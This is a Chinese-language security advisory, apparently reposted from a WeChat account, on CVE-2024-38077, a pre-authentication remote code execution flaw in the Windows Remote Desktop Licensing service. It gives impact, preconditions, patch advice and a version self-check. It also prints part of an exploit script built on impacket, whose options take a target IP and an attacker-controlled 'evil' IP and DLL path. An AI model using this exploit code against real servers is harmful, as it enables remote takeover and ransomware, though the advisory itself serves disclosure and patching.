漏洞影响:
该漏洞存在于Windows远程桌面的许可管理服务(RDL)中,攻击者无需任何条件,无需用户交互,可直接获取服务器最高权限执行任意操作。漏洞影响Windows Server 2000到 2025所有版本,存在近30年。
该漏洞可稳定利用、可远控、可勒索、可蠕虫等,破坏力极大,攻击者无须任何权限即可实现远程代码执行。
漏洞基本条件:
开启 Windows Remote Desktop Licensing (RDL)
漏洞检测exp:
只发布代码片段,有需要的可以去github获取。
来源:https://github.com/qi4L/CVE-2024-38077/tree/master
import struct, hashlib, argparse from time import sleep from impacket.dcerpc.v5 import transport, epm from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.ndr import NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRCALL, NDR from impacket.dcerpc.v5.dtypes import BOOL, ULONG, DWORD, PULONG, PWCHAR, PBYTE, WIDESTR, UCHAR, WORD, LPSTR, \ PUINT, WCHAR from impacket.uuid import uuidtup_to_bin from Cryptodome.Util.number import bytes_to_long from wincrypto import CryptEncrypt, CryptImportKey UUID = uuidtup_to_bin(("3d267954-eeb7-11d1-b94e-00c04fa3080d", "1.0")) TRY_TIMES = 3 SLEEP_TIME = 210 DESCRIPTION = "MadLicense: Windows Remote Desktop Licensing Service Preauth RCE" dce = None rpctransport = None ctx_handle = None handle_lists = [] leak_idx = 0 heap_base = 0 ntdll_base = 0 peb_base = 0 pe_base = 0 rpcrt4_base = 0 kernelbase_base = 0 BBYTE = UCHAR if __name__ == '__main__': parse = argparse.ArgumentParser(description=DESCRIPTION) parse.add_argument("--target_ip", type=str, required=True, help="Target IP, eg: 192.168.120.1") parse.add_argument("--evil_ip", type=str, required=True, help="Evil IP, eg: 192.168.120.2") parse.add_argument("--evil_dll_path", type=str, required=False, default="\\smb\\evil_dll.dll", help="Evil dll path, eg: \\smb\\evil_dll.dll") parse.add_argument("--check_vuln_exist", type=bool, required=False, default=False, help="Check vulnerability exist before exploit") args = parse.parse_args() pwn(args.target_ip, args.evil_ip, args.evil_dll_path, args.check_vuln_exist)
修复建议:
微软官方已发布针对该漏洞的修复方案,打补丁
自查方式:
检查系统版本
“运行”,输入“winver”后执行确定,检查对应系统版本是否存在此漏洞
原文始发于微信公众号(信安王子):windows核弹级RCE漏洞(CVE-2024-38077)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论